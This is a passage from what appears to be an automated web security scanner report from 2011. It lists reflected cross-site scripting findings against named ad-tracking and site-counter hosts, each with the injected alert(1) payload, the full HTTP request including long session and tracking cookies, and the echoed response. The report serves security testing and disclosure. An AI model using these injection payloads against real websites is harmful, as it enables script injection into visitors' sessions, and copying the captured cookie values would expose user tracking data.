Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:10:18 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 404

document.write('<img width="0" height="0" src="http://tag.admeld.com/match68af2';alert(1)//795c1f771d3?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304734238&custom_user_segments=%2C11265%2C49026%2C49027%2C50185%2C4625%2C6551%2C10656%2C24493%2C30767%2C14769
...[SNIP]...
7.29. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa20"><script>alert(1)</script>f930ba57874 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4aa20"><script>alert(1)</script>f930ba57874&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15092%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:39 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2447822087988458761&fpid=4aa20"><script>alert(1)</script>f930ba57874&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
7.30. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801c8"><script>alert(1)</script>131f7da3ea4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=801c8"><script>alert(1)</script>131f7da3ea4&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15092%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4010451028652069296&fpid=4&nu=n&t=&sp=801c8"><script>alert(1)</script>131f7da3ea4&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 695f8'%3balert(1)//5ff8671c168 was submitted in the site parameter. This input was echoed as 695f8';alert(1)//5ff8671c168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s28japanator695f8'%3balert(1)//5ff8671c168 HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
